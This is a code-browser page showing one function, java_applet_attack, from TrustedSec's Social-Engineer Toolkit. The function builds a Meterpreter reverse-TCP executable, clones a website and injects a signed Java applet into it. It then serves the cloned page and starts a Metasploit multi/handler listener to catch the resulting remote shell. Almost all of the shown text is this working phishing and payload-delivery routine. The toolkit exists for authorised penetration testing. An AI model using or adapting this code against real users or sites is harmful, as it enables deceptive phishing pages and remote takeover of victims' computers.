MCPcopy
hub / github.com/trustedsec/social-engineer-toolkit / java_applet_attack

Function java_applet_attack

src/core/setcore.py:657–686  ·  view source on GitHub ↗
(website, port, directory)

Source from the content-addressed store, hash-verified

655# and additional capabilities.
656#
657def java_applet_attack(website, port, directory):
658 # create the payload
659 meterpreter_reverse_tcp_exe(port)
660 # clone the website and inject java applet
661 site_cloner(website, directory, "java")
662
663 # this part is needed to rename the msf.exe file to a randomly generated
664 # one
665 filename = check_options("MSF.EXE=")
666 if check_options != 0:
667
668 # move the file to the specified directory and filename
669 subprocess.Popen("cp %s/msf.exe %s/%s" % (userconfigpath, directory, filename),
670 stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
671
672 applet_name = check_options("APPLET_NAME=")
673 if applet_name == "":
674 applet_name = generate_random_string(6, 15) + ".jar"
675
676 # lastly we need to copy over the signed applet
677 subprocess.Popen(
678 "cp %s/Signed_Update.jar %s/%s" % (userconfigpath, directory, applet_name),
679 stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
680
681 # start the web server by running it in the background
682 start_web_server(directory)
683
684 # run multi handler for metasploit
685 print_info("Starting the multi/handler through Metasploit...")
686 metasploit_listener_start("windows/meterpreter/reverse_tcp", port)
687
688#
689# this will create a raw PDE file for you to use in your teensy device

Callers

nothing calls this directly

Calls 5

site_clonerFunction · 0.85
check_optionsFunction · 0.85
start_web_serverFunction · 0.85
print_infoFunction · 0.85
generate_random_stringFunction · 0.70

Tested by

no test coverage detected